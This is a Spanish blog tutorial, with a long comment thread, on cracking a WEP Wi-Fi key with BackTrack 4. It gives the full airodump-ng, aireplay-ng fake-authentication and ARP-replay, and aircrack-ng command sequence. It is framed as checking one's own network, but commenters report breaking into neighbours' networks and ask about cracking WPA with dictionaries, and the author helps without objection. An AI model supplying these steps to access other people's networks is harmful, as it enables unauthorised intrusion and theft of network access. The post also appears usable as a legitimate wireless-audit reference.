Manual Backtrack 4 Final / Seguridad Wireless

No respondo a preguntas sobre problemas ya resueltos, leer los comentarios, y si no esta el problema resuelto, comentad. gracias

PD: Tampoco respondo a preguntas, que se solucionan rápidamente googleando

Hola amigos, esta vez os traigo un manual para comprobar la seguridad wireless de nuestra casa, es muy útil para verificar si necesitais reforzar la seguridad wifi, para ello necesitaremos un DVD-Live de Back Track 4 Final y un portátil o un sobremesa con tarjeta wireless.

Al final pondre los links de descarga y matizaré sobre algunos comandos.

Una vez conseguido el Back Track 4 insertamos el DVD en la unidad óptica y reiniciamos el PC. Según la bios de la placa tienes que darle a F2 o Esc o F10…etc para entrar al menú de arranque, una vez aquí seleccionar la unidad óptica y pulsar Enter.

Una vez pulsado Enter saldrá una ventana con varias opciones a elegir, elegir las dos primeras de arriba que corresponden al Inicio con Resolucion 1024×768 o con la Resolucion 800×600. Una vez cargue el Sistema, saldrá una ventana de línea de comandos y debereis poner “startx” y empezará el modo gráfico.

Aquí empieza todo el proceso:

Abrir un terminal para ver que interfaz estamos usando, para ello escribid sin comillas:

“airmon-ng”

Una vez sepamos nuestro interfaz procedemos a escanear la red, volvemos a escribir en la misma terminal:

“airodump-ng wlan0″ (wlan0, ath0,…etc es el interfaz)

Cuando ya observemos que encuentra nuestra red, cancelamos el proceso con Tecla Ctrl + Tecla C, abrir una nueva terminal y escribimos en este caso para capturar balizas de señal (Beacons) y paquetes de datos (#Data/s):

“airodump-ng -w wep -c 11 –bssid ff:ff:ff:ff:ff:ff wlan0″

[airodump-ng -w (nombre del archivo que se creará, en nuestro caso wep) -c (canal) --bssid(bssid) interfaz]  //es posible que no identifique la red y os pedirá que introduzcais el ESSID ( es el nombre de la red) en este caso pondremos [--essid nombre_de_la_red].

Los datos de el canal y bssid deben ser los de nuestra red wireless.

Atencion: no detener el proceso hasta que tengamos por lo menos 35.000 paquete de datos(#Data/s)

El siguiente paso es asociarnos a la red para ello abrimos una nueva terminal y escribimos (se puede hacer mientras está capturando paquetes) el siguente comando:

“aireplay-ng -1 0 -a ff:ff:ff:ff:ff:ff wlan0″

Una vez asociados en la misma terminal escribimos este comando para abrir/leer los paquetes capturados en el comando antes puesto que sigue corriendo:

“aireplay-ng -3 -b ff:ff:ff:ff:ff:ff wlan0″

Una vez obtenidos los 35.000 paquetes de datos como mínimo y leidos unos tantos miles tambien, procedemos a crackear la contraseña.

Primero debemos saber como se llama el fichero donde se ha almacenado, para ello en la terminal, escirbimos:

“dir” y copiamos el nombre del fichero .cap

Una vez realizado esto pasamos al último paso:

“aircrack-ng wep-01.cap”

Con este comando empezará a averiguar la contraseña de nuestra wireless, si no la saca es que tiene buena seguridad o que no as conseguido suficientes paquetes, pero dada que la autenticacion es WEP, la sacará porque se ha quedado obsoleto y se puede averiguar la contraseña como en este manual os explico.

Os recomiendo poner de seguridad WPA/PSK o WPA2

Descarga  Back Track 4 Final: 1570MB

Torrent: http://www.backtrack-linux.org/bt4-final.iso.torrent

Descarga Directa: http://www.backtrack-linux.org/download.php?fname=bt4f

Descarga  Back Track 4 Final version VM ware: 2000MB

Torrent: http://www.backtrack-linux.org/bt4-final-vm.zip.torrent

Descarga Directa: http://www.backtrack-linux.org/download.php?fname=bt4fvm

Opciones de comandos:

–bssid = MAC del Punto de acceso/Router

La MAC es un es un identificador de 48 bits que corresponde de forma única a una tarjeta de red. (ff:ff:ff:ff:ff:ff)

-c canal = es el canal de nuestra red puede oscilar del 1 al 11

Espero que les haya servido este post, es muy bueno, funciona 100%, si no coje la tarjeta de red es que el Sistema Operativo no tiene el driver de su tarjeta de red, espero respuestas.

Ya saben agregen a favoritos!
Espero que les haya servido,comenten, no cuesta nada.
Me costó trabajo hacerlo.
Un saludo.

Relacionados: Backtrack 4 Final en USB


142 comentarios to “Manual Backtrack 4 Final / Seguridad Wireless”

  1. muy guapo tio:D

  2. Muy currado Danii, Yo me hubiera amargado haciendo algo asi. :D

  3. mmm copado, pero sabes cuando saldra la version 4.0 Final???

  4. compadre… su manual me sirvio de mucho. Gracias. Le hice una que otra modificación pero me sirvio mucho. Voy a tratar de hacerlo en una maquina virtual, onda probar que onda y sacar unos mejor screenshot para = subirlos, pero voy a decir que lo saque de aca!!!
    GRacias men!

    • De nada amigo. Los screenshot son de internet porque en máquina virtual no puedo capturar paquetes, ni hacer nada.
      Gracias de antemano por divulgar el blog/post.

      PD: Ya puse la modificacion que creo que tuviste que poner, es que normalmente no me pedia el ESSID, pero ya he arreglado las opciones, en caso de que os salga.

      Atte.
      daniskate

  5. Hola, felicidades por la guía, esta muy bien.

    Tengo un problemilla, a ver si me puedes ayudar. Una vez pongo mi tarjeta en modo monitor, al escribir airodump-ng wlan0 me sale el siguiente error:

    ioctl(SI0CSIFFLAGS) failed: No such device

    No entiendo a que viene ese error, pues la WIFI me la reconoce del tirón y aparece en modo monitor si escribo iwconfig. El mismo error me sale si creo tarjetas virtuales (mon0, mon1,..).

    ¿Alguna solución?

    Mi tarjeta es ésta (chip Atheros): http://www.pccomponentes.com/TP_LINK_ADAPTADOR_WIFI_802_11G_CHIP_ATHEROS___ANTENA.html

    Utilizo la última versión disponible de BT4

    Un Saludo

    • Soy el de antes. Como siempre pasa, me doy cuenta del problema justo después de pedir ayuda.

      El wifi que me reconoce y pone en modo monitor es el de mi portátil (chipset intel) sólo que lo tenía desactivado y por eso salía el error. Ahora el problema es otro, no me reconoce mi tarjeta wifi con chipset Atheros :S

      • ¿Arrancas el Backtrack con el USB wifi conectado?
        ¿Has probado con airmon-ng start ?

        Si no es eso..comenta y aver si logramos que funcione, no creo que sea por la BETA y que no esten los drivers de tu chipset, no creo que sea tan reciente la tarjeta wireless..

        Un Saludo.

      • He probado a iniciar BT4 con el WIFI conectado y tambien a iniciarlo primero y conectarlo despues. En los dos casos, en una herramienta que trae BT4 para ver los dispositivos USB, me sale conectada ATHEROS.

        En cambio, en consola a escribir iwconfig sólo aparece la de mi portátil.

        Con airmon-ng start wlan0 puse en modo monitor el wifi de mi portátil que es el único que aparece. Probé con wlan1,2, wifi0, wifi1,… por si lo tenía asignado a la tarjeta aunque no apareciese y nada.

        La verdad es que es muy raro, antes de comprarla me aseguré bien de que funcionaba, googlee y con BT4 es la única compatible ya que tiene un chip Atheros bastante reciente y la gente no tiene problemas para que lo detecte BT4.

      • Pues es muy raro :S
        En teoria las atheros son detectadas con ath0, ath1…
        Creo que sobra preguntar si los conectores USB estan bien..que como creo que debes de saber…hay gente muy inexperta…

        Puedes hacer otra cosa, instálate el VM Ware , arranca con la iso y enchufa la tarjeta y aver si la piya así.
        (El VM Ware si permite conexiones USB)

        Un Saludo.

      • Perdona por tardar tanto en responder, he estado haciendo pruebas con el vmware y demás, y nada de nada. Googleando y leyendo por foros ya sé cual es el problema.

        El problema es que no es compatible y en pccomponentes viene mal la información. La versión 1.0 de este adaptador trae el chipset Chip Zydas (pertenece a Atheros) en cambio la nueva versión 2.0 que es la que tengo trae el chipset Atheros y este tipo de chipset sólo es compatible en versión pci y no por USB.

        Intentaré mandarle un correo a pccomponentes a ver que me dicen aunque pasado ya los 15 días lo veo dificil.

        saludos y gracias por la ayuda.

    • Ya me sonaba ami que era algo de eso, de incompatibilidad, falta de drivers…etc

      Pues nada amigo, a aver si te devuelven eso, o a esperar que salga la versión final del Backtrack 4…Aunque yevan ya algun tiempo con la Beta…

      Un Saludo.

      De nada amigo, para eso estamos.

  6. EN EL APARTADO:

    “El siguiente paso es asociarnos a la red para ello abrimos una nueva terminal y escribimos (se puede hacer mientras está capturando paquetes) el siguente comando:

    aireplay-ng -1 0 ff:ff:ff:ff:ff:ff:ff wlan0 ”

    Cuando escribo este apartado me sale el mensaje siguiente:
    “aireplay-ng –help” for help

    Es como si no reconociera la orden…Me puedes ayudar?
    Gracias.

    • Pero…que es lo que pones..
      ff:ff:ff:ff:ff:ff:ff???
      en vez de ff:ff:ff:ff-…tienes que poner la direccion MAC del punto de acceso(PA).

      Es lo que he podido deducir a partir de tu mentario… explicate algo mas porfavor.

      Saludos

  7. Excelente tutorial amigo, lo pondre en practica jeje, les cuento que yo he sacado claves web con backtrack 3 con ayuda de el siguiente manual que no falla, por siaca te lo dejo, para los que tienen la version 3 y no la version 4 del backtrack, el link es: http://hacking-wireless-en-minutos.blogspot.com/ Tengo una pregunta, con la version 4, ¿se puede sacar claves con seguridad TKIP?

    • De nada amigo, veo que el tuyo tambien esta currado. jeje
      Pues estube probando en casa, pero un poco experimental, y no lo conseguí, probaré algun otro dia que tenga más tiempo.
      Que no tengo tiempo si quiera a postear, casi q me dedico a contestar a la gente.
      Un Saludo.

  8. Excelente aporte compadre… en ningun lado consegui algo tan completo como acá… Felicidades!

  9. SAlu2 amigos.

    Tengo un problema…. con el paso aireplay-ng -3 -b xx:xx:xx:xx:xx:xx wlan0
    en el tutorial dice que hay que esperar DATA llegue a unos 35000, cierto???, yo he dejado + de 30 minutos corriendo el comando y apenas me ha llegado a 1275, a qué se debe eso???
    espero puedan ayudarme

    • Mas de 35000 o mas o menos…en algunos casos mas en algunos menos…

      El tiempo no influye en los paquetes capturados, si estas cerca del AP y éste tiene tráfico con otros dispositivos portátiles, captura los paquetes mucho más rapido que si no hay ningun dispositivo portátil haciendo tráfico con el AP.

      Espero que te haya servido.
      Un saludo.

      • gracias x la respuesta..
        entonces eso quiere decir que si no hay tráfico, la captura de datos será lenta???, bueno entonces no me queda otra que seguir intentando…

        salu2.

    • Claro, lo que estas haciendo es capturar los paquetes que se envian entre el AP y el dispositivo, si no tienes trafico que captar, no tienes paquetes que puedes interceptar.

      Un consejo personal: Supon un horario en el cual puede que haya algun dispositivo wifi concetado al AP creando trafico…

      Saludos

      • gracias x la respuesta.
        hoy realicé la prueba y esta vez funcionó muy bien.

        gracias nuevamente.

        salu2.

  10. hola, muy buenn tutorial. Me he creado una maquina virtual con la el backtrack y al poner airmon-ng no me aparece nada en el interface ni chipset ni driver y nose porque sera. Tengo una tarjeta de red atheros AR5B93 y tampoco me funciona con el wifiway1.0 ya que no me la lee

    Gracias

    • La interfaz que usa la maquina virtual es ethX o por el estilo, no usa fisicamente la tarjea de red que tenga tu equipo, debes usar el Backtrack arrancado fisicamente (sin maquina virtual).

      Saludos.

      • Para quien lea esto, Si inicias BackTrack desde una máquina virtual, deberás disponer de un controlador WiFi USB conectado a un puertos USB de tu computador. BackTrack arranca en la máquia virtual Y RECONOCE EL CONTROLADOR WIFI USB, mas no el de la tarjeta de red inalámbrica conectado a la placa madre del computador.

  11. Sabes como ejecutar el bactrack sin necesidad de grabarlo en un cd? lo digo porque en la maquina virtual como bien dijiste, no funciona y ahora mismo no dispongo de cd por encima de 700mb

    Un saludo

    • Para ejecutarlo desde Maquina Virtual debes tener una tarjeta USB Wireless que te permita inyectar y que la reconozca el Backtrack, con lo que la mejor opcion es grabarlo en DVD y arracar desde el CD.

      Saludos.

      • muchisimas gracias!!! entonces lo grabo en un dvd y al arrancar windows doy a f12 para arrancar bacjstrack y ya valdria no? o hace falta tener particion de linux? te lo pregunto xq ahora no lo puedo probar por mi mismo ya que no tengo dvd

        Un abrazo!!

  12. No, no hace falta tener particion para instalarlo, es Live CD.
    Saludos.

  13. La verdad, tu manual junto con el complemento de un video en youtube, lograron que pudiera vulnerar las cuentas que quse en 5 minutos cada uno. Te felicito por hacer esto TAN fácil y más, cuado mi ACER con una Atheros AR5B93 era tachada de que no servía para esto en todos los foros, pero con el backtrack y tu ayuda logré hacerlo. GRACIAS de veras, como prueba fehaciente estoy desde la red del vecino, claro que solo lo hago con motivos educacionales :P

  14. una cosa tengo una tarjeta de red atheros ar53b93 y no me la detecta el programa que puedo hacer soy nuevo en esto gracias

  15. Y eso como podría descargarmelos? o no hay nada que hacer???
    Gracias

  16. ya e conseguido hacerlo funcionar pero tengo una duda mi red es WAP2 se puede descifrar con este programa gracias

  17. e estado probando y me sale un error cuando tecleo startx, parpadea la pantalla y sale lo siguiente:

    Fatal server error
    No screens found
    giving up
    #conexion reset by peer (errno 104)unable to conect to X server
    #no such proces (errno 3: server error.
    lo estoy buscando la causa y no doy con la solucion me podeis ayudar
    gracias

  18. mi tarjeta gráfica es una ATI Radeon HD 4570

  19. le e dado a todas las opciones de arranque y en todas me sale ese error 1024, 800, etc.

  20. si pero no e encontrado nada que me sirva e encontrado soluciones para el black track 3 pero no me valen para le 4

  21. hola buenas!!!soy nuevo en esto y estoy perdido.
    tengo un ordenador con una athero ar5b93 y cuando tecleo airmon-ng no me sale nada, me imagino que es problema de driver, como instalo el driber y lo mas dificil, esixte el driver??gracias

    • Creo que esta soluionado de antes, por favor, revisen los comentarios, para evitar preguntas repetidas.

      Gracias.

      • si esta solucionado de donde bajarte los drivers pero yo el problema que tengo es que no se como se cargan en bt4 cuales son los comandos y esas cosas para cargalo.
        gracias

  22. salu2.
    tengo una duda… el backtrack4 me dice que la clave es: 10:11:12:13:14:15…. ese resultado tengo pasarlo de hexa a decimal o uso la clave así como está???

    • Prueba poniendolo asi como está o si no, pues lo pasas, no creo que te cueste mucho mas esfuerzo del que ya le has dedicado a sacar la clave.
      Saludos.

  23. Yo tb tengo el mismo problema que david,como se cargan los drivers en bt4.tengo una atheros AR5B93

  24. Ya esta solucionado,ahora lo que me pasa eske cuando pongo aireplay-ng -1 0 ff:ff:ff:ff:ff:ff:ff wlan0 ” (en vez de las f pongo la direccion MAC del punto de acceso)

    Cuando escribo este apartado me sale el mensaje siguiente:
    «aireplay-ng –help” for help
    tiene q salir eso? o algo esta mal
    Una ayudita please
    Gracias

    • Tienes que poner la opción -a en este modo:
      aireplay-ng -1 0 -a ff:ff:ff:ff:ff:ff wlan0
      Gracias por reportar el “error” de escritura, un fallo lo tiene cualquiera.(Ya está corregido)
      Espero que no te haya molestado mucho.
      Gracias a ti.

      Saludos.

      • No t preocupes, q ademas eres tu el q esta aki ayudando a muxa gente,jeje. Haber si consigo hacerlo funcionar XD
        Saludos

      • yo pongo aireplay-ng -1 0 -a ff:ff:ff:ff:ff:ff wlan0 y me da error

  25. hermano 100% buenisimo muy currado faltan agunos detalle pero ya sabe san google estan las respuestas XD me funciona asta con la tarjeta mas sensilla muy bueno un saludo des de las afortunada “canaria”

  26. pues yo apenas lo voy a intentar espero que me ayuden por si me atoro
    saludos

  27. saludos a todos

    tengon un problema tengo una hp pavilion dv4-1416la no identifica la tarjeta de red que puedo hacer en este caso.. espero y me puedan ayudar

    mi correo es playcar_18@hotmail.com

  28. Gracias por el manual me sirvio de mucho, pero tambien tengo un miniportatil de los nuevos y estos vienen sin unidad de dvd. Como puedo arrancar el programa entonces?

    • Mira aver si puedes desde USB…aunque ya con los netbook no estoy tan seguro de que estén los drivers del chipset…
      pero por probar no pierdes nada…no te gastas ni para un CD jeje.
      Saludos y gracias a ti.

  29. hola una ? ya tengo el software, la duda es para que sirve el torrent’s

  30. ayuda ayuda, en el paso de aireplay-ng -1 0 -a ff:ff:ff:ff:ff:ff wlan0″ escribo todo bien y sale unas lineas que dicen QUE SE ESTA ENVIANDO AUTENTICACION ” y despues de un rato sale ATTACK UNSUCEFULL o algo asi, a que se debe

  31. literalmente en ese paso dice que esta enviando autenticacion y luego sale que el ataque ha fallado.

    • Se debe a que no terminas de asociarte al P.A. y por eso te sale Attack unsucesfull.
      Es posible que tengas el filtro MAC activo en el P.A. y no puedas entrar, por el filtro MAC.

      Saludos.

      daniskate

      • y como soluciono eso

      • Habilitando tu MAC en la pagina de configuracion del router.
        Concretamente en la pestaña o seccion Filter MAC.
        Y ya puedes poner para habilitar tu mac o denegar las MACs que tu le especifiques.

        Saludos

    • ese no es un problema continua con el aireplay no te hagas bolas.

  32. Yo tambien tengo la atheros ar5b93 y cuando estoy escaneando, el PWR me sale en -70 y tengo el router a 3 metros, alguien saber por que?
    Saludos

    • Ami tambien me sale la columna de PWR un poco loca, parece ser que no funciona al 100% con todas las tarjetas inalambricas.

      Saludos

  33. SIRVE PARA CRACKEAR REDES CON SEGURIDAD WPA??

    • No, para redes con WPA, se obtiene la contraseña bajo diccionario, no se puede capturar la contraseña a través de los paquetes enviados entre P.A. y Host.
      Espero que te haya solucionado la duda.

      Saludos.

  34. que onda muy bueno tu manual, yo traigo una bronca, tengo bien en claro que mi targeta wifi no sirve para iyectar ni snifear, y me aboracee y compre una tplink wn442g pero no tengo ni la minima idea de como agregarla a back track, si alguien me puede echar la mano se los agradeceria, y si acaso la cambio creo que la que si es compatible es una w321g de tplin me podrian decir tambien como la agrego

    • Deberias de mirar el chipset de la tplink wn442g y luego en la página de backtrack si admite ese chipset para inyectar y oler las redes.
      No te contesto precisamente a tu pregunta porque no me sé los modelos ni nada, jaja.
      Espero que te haya servido.
      Saludos

  35. hola a todos e encontrado la respuesta pero no lo se acer soy un noob en estas cosas:
    Primero haz un backup del archivo /etc/X11/Xorg.conf

    Código:

    mv /etc/X11/Xorg.conf mv /etc/X11/xorg.conf_backup

    Ahora en el directorio /etc/X11 deberias de ver un archivo xorg.conf-vesa o algo parecido, ahora no lo recuerdo de memoria, pero se que contiene la palabra vesa.

    Lo que tienes que hacer es cambiarle el nombre

    Código:

    #Ver que archivos tienes en la carpeta /etc/X11
    ls /etc/X11

    #Cambiar el nombre del archivo xorg.conf-vesa
    mv /etx/X11/xorg.conf-vesa /etc/X11/xorg.conf

    Ahora ejecuta el X

    Código:

    startx

    si algien save acerlo podria decirmelo o acer un video tutorial
    gracias agradecido

  36. hola una consulta el aircrack-ng como veo en tu captura es de la version 0.5
    esa no venia con el BT3 por que no salio otra version ……ps yo vi en otro foro que tenia a el aircrack-ng 1.0.2 con el BT4

    • Las capturas son de internet, ya que no podia realizar las capturas en ese momento.
      Lo importante es el contenido no la version ni nada jeje.
      Un Saludo

  37. Ayudame a solucionar mi problema ok, mira ya he intentado con todas las redes que hay al alcance que tienen seguridad wep,,, en todas llego solo a este paso “aireplay-ng -1 0 -a ff:ff:ff:ff:ff:ff wlan0″ pongo todo correcto, y luego sale SENDING REQUEST… y luego sale ATTACK UNSUSCEFULL, como lo arreglo porfavor ayudenme

  38. En verdad funciona con la tarjeta ATHEROS AR5B93 GRACIAS!!!! ya lo habia hecho funcionar con la rtl8187l pero tenia mucho intentando con la atheros.

  39. hola amigo, espero me constestes. mira. he hecho todos los pasos pero cuando utilizo este comado aireplay-ng -3 -b ff:ff:ff:ff:ff:ff wlan0 en ua terminal nueva no cargan los paquetes que deberian llegar como tu dices a los 35.000, quisiera saber a que se debe, si puedes me constestas. gracias.

  40. osea claro que utilizo el ESSID puesto esto lo puse como referencia aireplay-ng -3 -b ff:ff:ff:ff:ff:ff wlan0. bueno ahora si, espero que me ayudes. gracias

  41. oye, yo arranco con mi cd de backtrack4, me sale la primera pantalla que escoja entre 1024×768, y luego me sale la linea e comandos en donde supuestamente pongo el airodump y esos, pero como le hago para habrir varias consolas?? no se mucho de esto gracias

    • La primera linea que te sale es para entrar de modo gráfico o mismamente lo puedes hacer en el modo consola en el qe te encuentras.
      y PORFAVOR LEER los comentarios

  42. oye amigo tengo una tarjeta de red WLAN broadcom 802.11 b/g y no me lo detecta que puede ser. se los agrdeceria mucho si me dijeran que pasa

  43. desafortunadamente el sistema no puede sacar la llave de redes wpa psk tkip en el que realmente se ve si el sistema es bueno o mala y en este caso es bastante deficiente para inyeccion de datos

  44. Hola muy bueno el tuto del las redes wep eso lo se hacer lo que busco ayuda es como se puede abrir redes wpa como se pone en el dvd el diccionario para descifrar claves saludos.

  45. Excelente y práctico manual, gracias fue de mucha utilidad.

  46. el nombre de ESSID me sale , no entiendo por que ya probe con otras redes y sale las redes disponibles pero ,en este caso solo me sale en ves del nombre de la red que ens este caso tiene por nombre “Otra red”

  47. en el post anterios me sale “”, en ves del nombre de la REd “Otra red”

  48. ya entendi sale “length 10″, creo que ais esta mejor

  49. hello,nose si podrian enviarme un manual para sacar claves wpa y wpa2-psk y tambien un manual para usar correctamente los diccionarios

  50. Varias preguntas,
    Como han instalado los drivers para la ATHEROS AR5B93?
    Cuando inicio en cualquiera de las opciones y pongo startx me pone error de screenserver o algo asi alguien me pude solucionar mis problemas?

    Gracias de antemano.

  51. tienes algun manual para desifrar redes wpa ya que dices que se desifran bajo diccionario, de antemano gracias, y otra duda al esperar la carga de #Datos, esta es demasiado lenta y la señal es buena, te imaginas esperar 10 hrs y ke solo baje 280 packetes de datos no se si eso es normal pero tengo varias señales buenas y es lo mismo en todas. Saludos y muy bueno el tutorial. gracias por tu esfuerso.

    • ## Con este comentario respondo tambien a los anteriores que preguntan lo mismo ##
      Pues lo de esperar para los paquetes de datos ( #Data ) influye el tráfico que este transmitiendo el Router / AP con alguna estacion inalámbrica conectada.
      Ya que si no hay ninguna estacion, no envía paquetes de datos, solo envia las balizas de señalicion.

      Para redes WPA si tengo un manual, pero lo tengo que preparar aun, el inconveniente de éste es que necesita de un diccionario para sacar la clave.
      Funcionamiento: Comprueba desde un fichero con muchas palabras, y prueba a asociarse a la red con cada una de las palabras de tal fichero.
      Si la contraseña es “casa” y en tu fichero está la palabra “casa” te responderá que la contraseña válida es “casa”.

      No es capaz de sacar la contraseña a través de los paquetes enviados al “aire” como con WEP.

      Saludos
      daniskate.

  52. saludos he logrado exitosamente sacar varios wep con este metodo. pero hay un par de router nuevos que no me deja.
    al poner el comando
    “aireplay-ng -1 0 -a ff:ff:ff:ff:ff:ff wlan0″
    dice que se asocia correctamente pero al poner el codigo
    “aireplay-ng -3 -b ff:ff:ff:ff:ff:ff wlan0″
    nunca obtengo un ARP y obviamente no manda paquetes.
    Esto solo me ha pasado con un par de router. no se si tengan alguna proteccion para evitar la asociacion falsa.
    hay algun otro metodo para generar trafico?

  53. como puedo abrir otra consola mientras se captura paquetes?? hay algun comando??

  54. El comentario no tiene relación con el post de Backtrack, así que no será publicado.
    Su problema al parecer es que ha formateado la partición de WINDOW$.
    No responda a éste mensaje, por favor.
    Saludos.

    daniskate

  55. ¿Te reconoce WLAN o no? Explícalo mejor por favor.
    Saludos.

  56. q tal! espero q lleves un excelente dia!
    Te escribo para pedirte ayuda, espero q me puedas ayudar.
    Tengo instalado BT4 Beta en usb, la corro muy bien, detecto las señales pero cuando intento atacar mi red me dice: “bash: airodump-ng-w: command not found”. Esto me aparece despues de que pongo esto: airodump-ng -w wep -c 11 –bssid ff:ff:ff:ff:ff:ff wlan0
    Bueno eso es todo espero puedas ayudarme de antemano muchas gracias !!

    • Hola. Pues un dia de estudios asique muy exelente no, pero bueno, gracias.
      “bash: airodump-ng-w: command not found” Te has comido un espacio airodump -ng [espacio] -w
      Saludos

      daniskate.

  57. cuando a algunas redes les parece esto: “54e”

    la letra “e” quiere decir q el router esta potegido y no podemos atacarlo?

    por q es el unico q tengo muy cerca, q la intensidad es del 80% y es el unico q no puedo pillarle ningun DATA.

  58. hola sabes no me reconoce la wireless de notebook ni de una tp-link que le puse pero leyendo por ahi sale que la solucion es cargarle el driver desde cd para esto tendre que instalar el back track a la pc ,?si lo hago desde una maquina virtual se puede hacer ? o varia el resultado .
    ojala y respondas

    saludos

  59. hola no se como montar el diccionario en el back track.
    ayuda porfa

  60. hola a mi me corrio perfecto, muy bueno, dime para señales con seguridad WPA/PSK o WPA2 tambien sirve¡????

  61. Hola Daniskate

    Ayer estuve probando el backtrack 4 que me descargue con un tutorial, y al intentar crear trafico con una WLAN_8C, me da error.
    No se si es por mi targeta intel 5100 que no permite inyeccion de paquetes, o el mismo router de telefonica, pero pude conseguir la clave web de mi router creando trafico con otro portatil y no pudo hasta los 50000 paquetes, por lo que voy a necesitar un buen metodo de inyeccion de paquetes ya que al parecer los propietarios no saben ni que es el WIFI, xD.

    Por cierto, muy buen trabajo, la parte de los comentarios es muy util.

    Un saludo

  62. quiero comentar que en mi caso es raro mi minilapto detecta varias redes solo que en parte no da que reciba el porcentaje de la señal y tampoco que me reciba paquetes hice todo lo del manual al pie de la letra y al querer leer los paquetes me dice que no hasta ahi llega

  63. Hola, saludos a todos, estoy investigando de hace ya tiempo, y he buscado en todos lados y nadie me puede dar una mano, tengo un problema a la hora de poner el airodump-ng , empiesa a escanear pero no me ve ninguna red, la unica manera de que vea redes es teniendo el airodump-ng ejecutando e irte a menu — internet — Wicd network manager y darle contantemente al boton de refresh, como si el programa lo activara. estoy usando bt4 ( backtrack 4 final ) colocando /etc/init.d/wicd start se activa pero igual ne ve redes sino ejecuto el programa y lo tengo con refresh apretado.

    alguna solucion? agradeceria cualquier cosa.

    mi placa en un rtl8180 ( tiene problemas cono wifiway y wifislax ) pero con la ultima vercion de backtrak no

  64. hola que tal, haber si es posible respondan a mi pregunta, puesto que no he visto ninguna respuesta ni pregunta al respecto:
    usé el backtrack 4 beta y corrío perfecto en una acer one aoa150 que detectó muy bien la chipset ath, pero luego lo corrí en una acer aspire 4732z, en lugar de poner como interfaz el ATH0, sale como WLAN0, pero no me reconoce prácticamente la tarjeta es una ATHEROS AR5B93 Y ya me bajé el controlador, ahora bien, aqui viene la situacion, y la pregunta. yo correo el backtrack desde mi usb, lo hago con el unetbootin desde windows, y corre perfecto, casi siempre puedo sacar claves, pero siempre con la interfaz WLAN0, ya me descargué los controladores para linux o mejor dicho para backtrack 4, pero, NO SE COMO INSTALAR LOS CONTRLADORES EN MI USBLIVE DE BACKTRACK 4, ojalá alguien me pueda apoyar puesto que he googleado y nada al respecto.

  65. Ya esta solucionado,ahora lo que me pasa eske cuando pongo airodump-ng -w wep -c -11 ff:ff:ff:ff:ff:ff:ff wlan0

    Cuando escribo este apartado me sale el mensaje siguiente: airodump-ng –help” for help
    Que ago en este caso explicame porfa

    Gracias

    • Erick, buenas noches. De lo que pusiste “airodump-ng -w wep -c -11 ff:ff:ff:ff:ff:ff:ff wlan0″ me parece que esta faltando la parte del –bssid, es decir, deberia ser: “airodump-ng -w wep -c -11 –bssid ff:ff:ff:ff:ff:ff wlan0″ (con dos guiones bssid) o por lo menos yo lo pongo asi. Tambien acordate que el “-11″ es respecto al canal de la red a la que nos queremos conectar. Disculpa si meto la pata recien hoy empece con esto y en mis pruebas-errores me pasaron situaciones similares a la tuya. Espero que te sirva. Saludos

  66. hola muy bueno tu aporte, pero sabes tengo un problema no me aparece la interfaz despues de introducir airmon-ng lo he hecho desde cd live y nada que puedo hacer???

  67. Hola!! Primero de todo darte las gracias y la enhorabuena por el todo el kurro y por lo bien que está todo explicado.
    Segundo preguntarte una cosilla. Verás, hasta ahora había funcionado con el backtrack 3 (estoy esperando a descargar el 4 y probarlo) y con éste, algunas redes me salían en canal 12, y cuando intentaba conectarme con esa red en ese canal, no había forma, siempre se conectaba en canal 11, con lo cual no me pillaba dicha red. Mi pregunta es si esto es debido a algún tipo de protección o bien problema del BT3, y si con el BT4 se soluciona o no, y si no, como poder solucionarlo.

    Muchas gracias por todo.

  68. no reconoce mi tarjeta de red es una broadcon BCM43XGBO dell

  69. ke tal amigo me atore en un problemita despues de que ya e cargado los 35.000 paquetes de datos como le hago para escribir el siguiente comando. tengo que reiniciar de nuevo con el dvd o como le hago para abrir otra consola

  70. Hola tengo una pregunta e estao buscando pero no encuentro solucion, puse el backtrack4 en dvd y va perfecto pero no me carga el modo grafico, sin embargo con el mismo dvd si va perfecto en otro pc mi pregunta es k porke en el mio no carga le de a la opcion k le de? muchas gracias espero vuestra ayuda plz

  71. gracias man eres mi heroe xD

  72. no creo que hayas respondido a esta pregunta. tengo una lap acer con red atheros ar5b93, y uso el bt4, con liveusb.
    supuestamente el la atheros debe de correr como ATH0, pero en lugar de eso, correo con WLAN0, he leído comentarios de cambios del backtrack 3 al 4, donde yo creo ke también eso ha sido modificado.
    finalmente he conseguido el driver para linux, pero no se como instalarlo en liveusb… espero haya alguna forma de como hacer eso. comento que hay un manual para modificar el ISO, pero considero que es mas factible instalar el driver ya una vez corriendo el liveusb.
    gracias.

  73. PRACTICO Y MUY SENCILLO
    MUCHAS GRACIAS HERMANO ME SIRVIO MUCHO……………..
    SI SABES ALGO DE ENCRIPTACION WAP TE AGRADECERIA MUCHO
    QUE ME DIJERAS…………………………………..
    DESDE TORREON COAHUILA UN SALUDO ¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡¡

  74. “airmon-ng start wlan0” utiliza este comando yo tambien tengo la misma targeta espero logres solucionarlo suerte

  75. muy buen trabajo chico sigue asi estos son los aportes que hacen falta en la red

  76. hola a todos, lo que pasa es que cuando inyecto paquetes (miren la foto,no es mia) no me deja o sea que solo hace read y no hace nada de sent ni nada de got xx arp requests, por favor ayudenme en esto
    http://www.tuto-fr.com/tutoriaux/crack-wep/usb-alfa-awus036s/aireplay-ng-3-millieu.png

  77. Hola, me podrias explicar esto, es que en tu tutorial pone esto: aireplay-ng -3 -b ff:ff:ff:ff:ff:ff wlan0 y en los otros tutoriales o que he visto pone esto:aireplay-ng -3 -e ESSID -a BBSID mon0 o aireplay-ng -3 -e ESSID -a BBSID wlan0, a uqe se debe es que hay varias formas de hacerlo.

  78. hola tengo un problema, al momento de elegir START BACKTRACK FRAME BUFFER (1024 X 768) O BIEN (800 X 600) me aparece el siguiente error: FOUD SCREEN CONFIGURATION,, supose que tendria que configurar mi manquina a esa resolucion pero lo volvi a ejecutar y me sigue apareciendo el mismo error,, ALGUNA RECOMENDACION O SOLUCION QUE ME PUEDAN DAR POR FAVOR?

  79. hola tingo problima con backtrack 4 , no me sale el numero de essid ( station) a la hora de encryptar los wpa por favor nececito un explecacion …gracias

  80. muy buena la info de la pagina, estuve viendo y buscando info por todas partes, y esto me parece que es de lo mejorcito que vi en la red.
    Estaria necesitando, que alguien me recomiende, que adaptador usb comprar para una acer one 150, con placa atheros 5007eg?? ya que yo tengo instalado un backtrack en vmware y no logro que funcione la tarjeta.
    Mientras tanto, sigo buscando info y aprendiendo. Gracias nuevamente por la informacion brindada.
